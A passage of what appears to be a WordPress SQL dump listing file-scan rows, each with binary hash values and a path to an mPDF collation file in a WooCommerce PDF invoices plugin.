|9YҌ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_New_Zealand.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('$6)Ȝ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Republic_of_the_Philippines.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('6鯦Z-\\ym~e','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Singapore.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('DlE˯+Tm','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('i-mj1ǚ}','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Trinidad_and_Tobago.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('%RrK184','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_United_Kingdom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-lT\"dd','-Ur~^%ʑ:`\\5/','',0,'?'),('\rƬr\\','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_United_States.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-lT\"dd','-Ur~^%ʑ:`\\5/','',0,'?'),('t/b\'(]\"','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/English_Zimbabwe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('s$↗kN','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Estonian_Estonia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\ZmB3fQqX','Osd,6wRt#W','',0,'?'),('asЂ2Re=','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Faroese_Faroe_Islands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('\nnzS>','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Filipino_Philippines.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('VQ>d0u9d#q','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Finnish_Finland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KY򤺪*I1L2','tS\"\nK-gȡU4^%','',0,'?'),(',~8&ug','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_Belgium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('V%%WMlG<M','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_Canada.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Rz-2$F[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_France.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),(')}yr5tWDH','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_Luxembourg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('e#','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_Principality_of_Monaco.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('\"^ժ3','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/French_Switzerland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('S/Ϧ5\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Frisian_Netherlands.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`H^=T d0d,','{\0N`M/9\r`','',0,'?'),('}:\"y\n8','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Galician_Spain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('$H̼7Pc&,z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Austria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('s55_t_','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Germany.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FM>(6','r-L\0.{`)1>w%t','',0,'?'),('eD]1ls','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Liechtenstein.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Ռaqh','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Luxembourg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('3a<겇rfk','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/German_Switzerland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('sS,6^`Nў_e','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Greek_Greece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#IޏԸ#-','8zH}?kZ6s;rv!t','',0,'?'),('O!?tt6','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Greenlandic_Greenland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9mqx+Nw','\ZڙRrFJ.wݖ?(','',0,'?'),('\0>:Lsq','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hausa_(Latin)_Nigeria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Pr0K:m\Z ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hebrew_Israel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Tl-f?U.ZR','$s$H\"29G&aUc','',0,'?'),('.\';֋dq','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Hungarian_Hungary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \\ү~bd`8','k\'}DG*nlou(aZ!z@N}E','',0,'?'),('\"?cFȹC%SF','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Icelandic_Iceland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wY\"/|\\','n)m9{/,5b5/?_NU','',0,'?'),('@Ĺ_yy:7\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Igbo_Nigeria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('/	XOi{ʫ4','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Indonesian_Indonesia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('f{{rXe-	','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Inuktitut_(Latin)_Canada.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('y՞}HVVGT','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Invariant_Language_Invariant_Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('D0tw@o<N','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Irish_Ireland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('-)<R[lFXh1','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Italian_Italy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Ҽ$r9;a','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Italian_Switzerland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),(',5!(;[IK\n','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kinyarwanda_Rwanda.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('bʊE;X!去','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kiswahili_Kenya.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('ҽ&N~SR,G','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Kyrgyz_Kyrgyzstan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('vN	H','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Latvian_Latvia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0cbyg]','gC;& ̯>l{m`p','',0,'?'),(';=O5C?','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Lithuanian_Lithuania.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\n~oQU!Bi','.cmVqN*wc:9','',0,'?'),('Zt]^','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Lower_Sorbian_Germany.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('*׬6\nbjp','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Luxembourgish_Luxembourg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('⅄ ׶8T?','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Macedonian_(FYROM)_Macedonia_(FYROM).php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ztyh+\"R','5uR6:w9>%3~ NH','',0,'?'),('ued`&\Zp:7','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Malay_Brunei_Darussalam.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('ry;sð','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Malay_Malaysia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('ܖ)K|V=9:','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mapudungun_Chile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<(q0 .T','Q2:Rmo;x6}e@','',0,'?'),('_,?_FAɷ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mohawk_Canada.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('#hiTn}|X','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Mongolian_(Cyrillic)_Mongolia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('tjZn9v','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Norwegian_(Nynorsk)_Norway.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9mqx+Nw','\ZڙRrFJ.wݖ?(','',0,'?'),('B1!MWp','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Occitan_France.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('vYY[Аm+','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Persian_Iran.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\02>*','j4 .Ǝxf:_\ryYWj','',0,'?'),('ݗr¼k?@Wζi','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Polish_Poland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƭ,MbLx\Zޝ','ΈsK0$(b\082u#FP','',0,'?'),('%zLIQM','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Portuguese_Brazil.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('3x?+','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Portuguese_Portugal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('A m+','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Bolivia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('jҜUW.8','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Ecuador.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('F\rJ4M][=','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Quechua_Peru.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('9Ƕ:+O@TA','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Romanian_Romania.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Eq	+ݸ	',' \\\0%I^\Z/՜3.','',0,'?'),('NkƘt','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Romansh_Switzerland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ccU=}D','VT;<V$\\:)ӵ..','',0,'?'),('؊<L7/wSJ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Russian_Russia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('e5B~(KF','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Inari)_Finland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),('i\')	|g7(:','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Lule)_Norway.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':?ަX!5WO','㣬:Sޏz*Z2','',0,'?'),('psaiNC','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Lule)_Sweden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),('QJ\\اmc~ʣ','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Finland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),('ЗGs 	gڥ(','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Norway.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':?ަX!5WO','㣬:Sޏz*Z2','',0,'?'),('\rV3$?q','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Northern)_Sweden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),('X[ϞM:.','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Skolt)_Finland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),(')U?\rs{4+','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Southern)_Norway.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':?ަX!5WO','㣬:Sޏz*Z2','',0,'?'),('AtuȈ]VB','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sami_(Southern)_Sweden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q\n3OǞ\rl','bϳ#!Ƅ1)c7U','',0,'?'),('m0,:`D9E_','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Cyrillic)_Bosnia_and_Herzegovina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),(' [3/acn','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Cyrillic)_Serbia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('HnDԇ\0D3','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Latin)_Bosnia_and_Herzegovina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[!@>;mJS','%{Y83\ncgIwlG=\0Ɨ','',0,'?'),('QE0Z\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Serbian_(Latin)_Serbia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[!@>;mJS','%{Y83\ncgIwlG=\0Ɨ','',0,'?'),('\0lI6+<','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Sesotho_sa_Leboa_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('&\rDe#[','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Setswana_South_Africa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('uyWdiD','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Slovak_Slovakia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_cDZe-','K}2	1-:ڷ\0,2\r^','',0,'?'),('6,BGWKc','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Slovenian_Slovenia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W,>\'lʊ[y_v\"\r','7	 UGMХ\Z!y3eH#≊','',0,'?'),('fZSrK5x','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Argentina.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('GwQ8;','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Bolivia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('HY\Zp4C#','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Chile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('Rt\'&','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Colombia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('u8!9hpi\0r','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Costa_Rica.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('eT\"JOV','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Dominican_Republic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('Tr]QD6F','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Ecuador.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('ȬФ$[m','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_El_Salvador.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('moC@4\0\0','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Guatemala.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('~Xț?.Ҿ߶r','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Honduras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('˃L/At','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Mexico.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('MEꡗ#uGc','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Nicaragua.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('蜨jS+蒨4','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Panama.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('r-~Pp,;c1Z>y','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Paraguay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('}3E]x~L','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Peru.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('$\0\"\'6','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Puerto_Rico.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('U\02K~','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Spain.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('wǶy-ÞeU)','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_United_States.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X~Zl2F4ڎL$','{_>LYerk<O\rJND	','',0,'?'),('Z*%zw2I','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Uruguay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),(']\"fP','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Spanish_Venezuela.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʆ꡹&pDg<','͋\"Aj+4\Z(P!\'!_\0','',0,'?'),('\0j\"jm.x$','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Swedish_Finland.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KY򤺪*I1L2','tS\"\nK-gȡU4^%','',0,'?'),('%4ğ͏<\0EwV','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Swedish_Sweden.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KY򤺪*I1L2','tS\"\nK-gȡU4^%','',0,'?'),('j\rZWd.<\Z(','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tajik_(Cyrillic)_Tajikistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('okcCuhR3_','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tamazight_(Latin)_Algeria.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k2?gbr','>\'~iP\"CS2whnr','',0,'?'),('=Ddl','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Tatar_Russia.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d<כϡ','6EK]\\Gx','',0,'?'),('xYkoA','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Turkish_Turkey.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D`BO-ȴ:~gj\0','YKCQrPH\0怜2-Yh','',0,'?'),('/Wʰ9ɂ=45j','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Turkmen_Turkmenistan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!^FM1J\Z#x.FZ','}TIw7%OcLa8M>','',0,'?'),('#Ta`\Z','wp-content/plugins/woocommerce-pdf-invoices/vendor/mpdf/mpdf/collations/Ukrainian_Ukraine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0$9\n+Q!!','-\r*# ! %